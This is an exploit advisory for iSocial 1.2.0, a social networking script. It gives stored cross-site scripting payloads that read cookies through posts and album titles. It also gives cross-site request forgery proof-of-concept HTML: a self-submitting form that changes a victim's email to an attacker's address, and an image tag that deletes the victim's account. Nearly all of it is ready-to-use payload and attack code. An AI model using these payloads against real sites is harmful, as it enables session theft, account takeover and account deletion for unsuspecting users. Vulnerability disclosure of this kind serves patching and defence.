# Exploit Title: iSocial 1.2.0 - Cross-Site Scripting / Cross-Site Request Forgery# Date: 2018-05-22# Exploit Author: Borna nematzadeh (L0RD)# Vendor Homepage: https://codecanyon.net/item/isocial-social-network-platform/21164041?s_rank=2# Version: 1.2.0# Tested on: Kali linux# POC 1 : Cross-Site scripting:1) Create your account and navigate to "write post".2) Put this payload and click on "post":<script>alert(document.cookie)</script>3) You will have an alert box in your page .# POC 2 : Cross-Site Scripting:1) Navigate to "Albums"and click on "create album"2) In title field , put this payload :
"/><script>alert(document.cookie)</script>3) In both cases , the payload will be executed after someone opens your
album or your profile.# POC 3 : Cross-Site Request Forgery:# iSocial - Social Network Platform 1.2.0 suffers from csrf vulnerability .# Attacker can easily change user's email or delete user's account .# Change email Exploit :<html><head><title>CSRF POC</title></head><body><form action="http://Target/isocial/demo/services/actionssetting/email" method="POST"><inputtype="hidden" name="em" value="lord2@gmail.com"/></form><script>
document.forms[0].submit();</script></body></html># Result :# html"The information has been updated"# status"OK"# message""# Delete account Exploit:<img src="https://www.exploit-db.com/exploits/44692/
http://Target/isocial/demo/services/actionssetting/delete">
